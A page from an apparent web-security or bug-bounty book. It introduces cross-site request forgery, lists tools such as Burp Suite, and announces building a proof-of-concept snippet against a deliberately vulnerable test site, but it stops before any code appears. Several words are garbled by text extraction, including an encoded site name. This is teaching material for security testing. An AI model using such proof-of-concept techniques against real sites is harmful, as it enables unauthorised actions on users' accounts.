CSRF and Insecure Session Authentication                                    Chapter 6

            Many frameworks (Spring, Joomla, and Django) have their own solutions for preventing
            CSRF, which usually consist of tying a cookie's authentication ability to a specific in-app
            action. But, despite CSRF's status as a solved problem, it persists as a recurring bug in the
            annual OWASP Top-10 surveys. Like SQLi, CSRF is a simple-but-damaging vulnerability
            that endures largely because of the tension in software development between security and
            productivity.

            The following topics will be covered in this chapter:
                      Mechanics of CSRF
                      Tools to use for finding and validating CSRF vulnerabilities
                      Discovering, validating, and reporting on CSRF vulnerabilities



            Technical Requirements

            For this chapter, we'll be using Burp Suite andbfor our everyday web browsing and
            proxybChrome (             ). We'll once again be employing Python 3.6.5 and the
            standard macOS version of shell (TI) for scripting.



            Building and Using CSRF PoCs

            A CSRF proof of concept is just a short HTML snippet that, when executed by a user, will
            take advantage of the weak CSRF defence and change the application state in unexpected
            or unwanted ways, validating the vulnerability.


            Creating a CSRF PoC Code Snippet

            As the basis for building a CSRF PoC snippet, let's go back to a form on the deliberately-
            vulnerable web app, XFCTDBOUFTU DPN, that's vulnerable to both XSS and CSRF:















                                                    [ 93 ]